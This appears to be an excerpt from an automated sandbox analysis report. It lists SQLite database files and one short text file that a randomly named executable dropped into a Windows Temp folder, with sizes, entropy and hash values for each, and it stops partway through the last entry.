                                                                                      C:\Users\user\AppData\Local\Temp\1OWRHYwu5l

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\1wUYxshXND

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\23aonXCROT

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\28XG9v0QXy

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\2jtxdHFYu1

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\2oqtVbJ4Gq

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\2z7mVvSSSm

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\3O4ivl9eXW

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\4MFotqcGvG

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\56xsx8qsya

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\5rmRG29T9e

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\6NeD6uzSrZ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\6iEK0QfiMw

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.373660689688184
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:r1hVytX:/Ul
                                                                                      MD5:375A50AA0635E37A7AFD31664D5864F6
                                                                                      SHA1:D3A685F1F9D509B277BB80A36E23760E06662270
                                                                                      SHA-256:6E5DEFCE6C3DE31D373704D8737CE3FD9D4EA002EED49C3A3C9CCF1208A82F86
                                                                                      SHA-512:AB7B22B39D2F81EE2B91E993EEFCBD559DA0F151F30C5FAB58872620B8B94457199106A9A378EEC85B4628D0B1B1C79BA60E2274258F875FDF943F01A1BCF74E
                                                                                      Malicious:false
                                                                                      Preview:PEnmFMKs54MNLRu2fXpIrrbHr

                                                                                      C:\Users\user\AppData\Local\Temp\6lbKOy0UTT

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\7bWcWNF7kN

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\7cRdzGnwM4

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\7wnmzew4uT

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\8DIxoMRtnA

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\8Jzbdnlz7Y

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\8q4SFTMyQJ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\8tVT7X9dlv

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\9JhFPZAAi1

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\9VzK1WfAz3

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
